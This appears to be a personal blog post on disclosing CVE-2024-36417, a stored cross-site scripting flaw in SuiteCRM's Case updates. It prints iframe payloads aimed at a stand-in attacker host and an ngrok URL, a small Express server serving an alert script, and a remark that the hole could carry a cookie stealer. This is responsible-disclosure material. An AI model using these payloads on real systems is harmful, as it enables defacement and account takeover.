Here is a brief introduction on me before starting, I’m a 19 y/o Cyber security enthusiast/learner who likes to hunt down bugs as passion. This is a very quick article on how i discovered my first CVE. So lets get into it…
CVE-2024–36417
Mire.org : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36417
NVD : https://nvd.nist.gov/vuln/detail/CVE-2024-36417
POC : https://github.com/salesagility/SuiteCRM/security/advisories/GHSA-3www-6rqc-rm7j
POC (Video) : https://drive.google.com/file/d/1LhQpeMNo-xBMy7ciRt-DvG2DbP7UUW-p/view
The Discovery 🔎
I was hunting for bugs on platforms like HackerOne and Bugcrowd and was onto nothing for months. Then i thought “Why don’t i hunt some open-source systems?”. Quickly hopped onto github and searched for well maintained CRM repositories. Then i found SuiteCRM. Had decent amount of stars and it was maintained frequently. Cloned onto my system, Started the server. I started clicking on all buttons, hyperlinks, navigation to map the webapp structure…
The Bug 🪲
After clicking through the system for about 1 hour i found a sweet spot! A feature for the users where they can post “Case updates” about a specific case. If i post a “Case update” as user1, the user2 can view it.
I started posting classic XSS payloads but it was getting filtered. Tried many tags but many of em didn’t worked. Finally, one tag worked! The <iframe> tag worked without getting filtered.
I tried posting :
<iframe src="https://test.attacker.com">And it worked, now i logged out from user1, and logged in to user2.
Went to the case page and there i can see the iframe being rendered successfully.
Now, to demonstrate impact, i created a webserver on my local machine with the following code :
const express = require('express');
const app = express();
const port = 2222
app.use(express.json());
app.get('/', async (req, res)=>{
return res.send("<script>alert('You are hacked')</script>");
})
app.listen(port, () => {
console.log(`Server started`)
});And i port-forwarded the web-server using Ngrok.
Then i crafted an iframe as follows:
<iframe src="https://test.ngrok-free.app">and posted it as a case update as the user1. I logged out from user1, and logged into user2 (victim).
When i visited the Case updates, BOOM! The page says “You are hacked”. Which means the XSS successfully worked through the iframe.
Now as an attacker i could do a permanent page defacement using the iframe and can also craft a cookie stealer webpage which can lead to a potential Account takeover attack.
Conclusion ✨
This was a quick & small article on my CVE discovery. Hope you liked it, Please clap for this story if you liked it. Thank You 💖
Timeline 🕔
Reported on : 15/01/2024
First response : 06/02/2024
CVE published on : 10/06/2024
